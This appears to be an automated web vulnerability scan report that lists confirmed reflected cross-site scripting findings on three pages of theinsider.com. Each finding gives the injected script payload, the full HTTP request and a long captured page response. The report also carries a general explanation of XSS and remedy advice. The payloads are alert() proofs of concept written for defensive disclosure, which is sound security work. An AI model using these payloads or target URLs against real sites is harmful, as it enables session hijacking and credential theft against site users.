IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /tv/

/tv/ CONFIRMED

http://www.theinsider.com/tv/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/scrip..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001D1)</script>

Request

GET /tv/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/tv/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:50 GMT
Content-Length: 11180
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>TV News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="tv" /> <meta name="date" content="2011-10-21 17:42:00" /><meta property="og:title" content="TV News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/tv/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="TV News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 17:42:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/tv;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/tv;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/tv;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=TV+hub+page+http://insdr.co/nlyRam+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/tv/tv.css" type="text/css" /><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/tv/"><img src="/media/img/channel_page_name_v3_tv.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html' class='black_text_link'><img src='/media/photo/2011/12/100426/tyra_banks_brooke_anderson_416.jpg' class='channel_vid_img' height='360' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html' class='black_text_link'>The 'Out of This World' 'ANTM' Season Finale</a></h4></div><div class='vid_excerpt'><p>One of Hollywood's hardest working stars, Tyra Banks, sat down with <em>The Insider</em>'s Brooke Anderson for a one-on-one chat about the upcoming season finale of <em>America's Next Top Model</em>, changes for the show's next season and her physical imperfections.</p><a target='_self' href='/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link'><img src='/media/photo/2011/10/93400/ahs_416_fx.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link horizontal_excerpt'>Rubber Man Returns! Watch!</a></h4><p></p><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/tv/46994_Happy_Endings_Christmas_episode_clip/index.html' class='black_text_link'><img src='/media/photo/2011/12/100127/damon_wayans_416.jpg' class='channel_vid_img' height='360' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/tv/46994_Happy_Endings_Christmas_episode_clip/index.html' class='black_text_link'>Exclusive 'Happy Endings' Sneak Peek</a></h4></div><div class='vid_excerpt'><p>As an early adapter of <em>Happy Endings</em>, I'm thrilled that season two has not only A) happened and B) been brilliant but C) found an amazingly devoted audience that delights in the ridicu-mazing hijinks that TV's best friends since <em>Friends </em>get into every week.</p><a target='_self' href='/tv/46994_Happy_Endings_Christmas_episode_clip/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html' class='black_text_link'><img src='/media/photo/2011/12/100136/kim_k_e_111205_416.jpg' height='360' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html' class='black_text_link'>'KKTNY' Recap: Kris & Kim Kompromise</a></h4></div><div class='vid_excerpt'><p>As Kim and Kourtney come to find themselves living separate lives from their significant others, a visit from Khloe sparks a move towards reconciliation for both sisters.</p><a target='_self' href='/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html'class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock leftb..
- /photos/index.html

/photos/index.html CONFIRMED

http://www.theinsider.com/photos/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001E6)</script>

Request

GET /photos/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/search/index.html?sort=date-sdate
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:53 GMT
Content-Length: 11919
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Photos | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="photos" /> <meta name="date" content="2011-10-21 18:55:00" /><meta property="og:title" content="Celebrity Photos | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/photos/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Photos | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 18:55:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/photos;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/photos;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/photos;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Photos+Channel+Page+http://insdr.co/oyhDW2+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <!-- BELOW: gallery/cover.mc --><link rel="stylesheet" href="/css/jqm/jqm.css" type="text/css" /><link rel="stylesheet" href="/css/photos/photos.css" type="text/css" /><style>.view_number {text-align: center; font-size: 12px !important; font-weight: bold !important; line-height: 1.1;}</style> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/photos/"><img src="/media/img/channel_page_name_v3_photos.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"><div class='gallery_box box_spacer'><a href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html'><img src='/media/photo/2011/12/100456/robert_downey_jr_benny_benassi_425_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html'>Celeb Doppelgangers [Pics]</a></p><a style="text-decoration: none;" href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html'><div class='view_number'>View all 64 photos</div></a></div><div class='gallery_box box_spacer'><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100372/megan_fox_425_tcanham_124432726_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/39237_Before_They_Were_Famous/index.html'>Before They Were Famous</a></p><a style="text-decoration: none;" href='/gossip/39237_Before_They_Were_Famous/index.html'><div class='view_number'>View all 62 photos</div></a></div><div class='gallery_box box_spacer'><a href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html'><img src='/media/photo/2011/12/100331/sarah_jessica_parker_425_131207207_134862517_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html'>What's Going on Sarah Jessica Parker?!</a></p><a style="text-decoration: none;" href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html'><div class='view_number'>View all 6 photos</div></a></div><div class='gallery_box box_spacer'><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100317/leann_rimes_julianne_hough_425_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'>The Good, the Bad and the Ugly</a></p><a style="text-decoration: none;" href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><div class='view_number'>View all 15 photos</div></a></div><div class='gallery_box box_spacer'><a href='/gossip/46990_Trevor_Project_Red_Carpet/index.html'><img src='/media/photo/2011/12/100222/neil_patrick_harris_david_burtka_425_134864596_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/46990_Trevor_Project_Red_Carpet/index.html'>Trevor Project: Stars Do Good, Look Good</a></p><a style="text-decoration: none;" href='/gossip/46990_Trevor_Project_Red_Carpet/index.html'><div class='view_number'>View all 15 photos</div></a></div><div class='gallery_box box_spacer'><a href='/gossip/40647_They_Dated_Surprising_Hookups/index.html'><img src='/media/photo/2011/12/100148/lara_flynn_boyle_eric_dane_425_98523801_57161619_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/40647_They_Dated_Surprising_Hookups/index.html'>Surprising Hookups</a></p><a style="text-decoration: none;" href='/gossip/40647_They_Dated_Surprising_Hookups/index.html'><div class='view_number'>View all 49 photos</div></a></div><div class='gallery_box box_spacer'><a href='/movies/46963_12_Must_See_December_Movies/index.html'><img src='/media/photo/2011/12/99945/425_thegirlwiththedragontattoo_111101_columbiapictures.JPG' alt='' /></a><p class='gallery_headline'><a href='/movies/46963_12_Must_See_December_Mov..
- /movies/

/movies/ CONFIRMED

http://www.theinsider.com/movies/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001E3)%3C/s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001E3)</script>

Request

GET /movies/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/movies/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
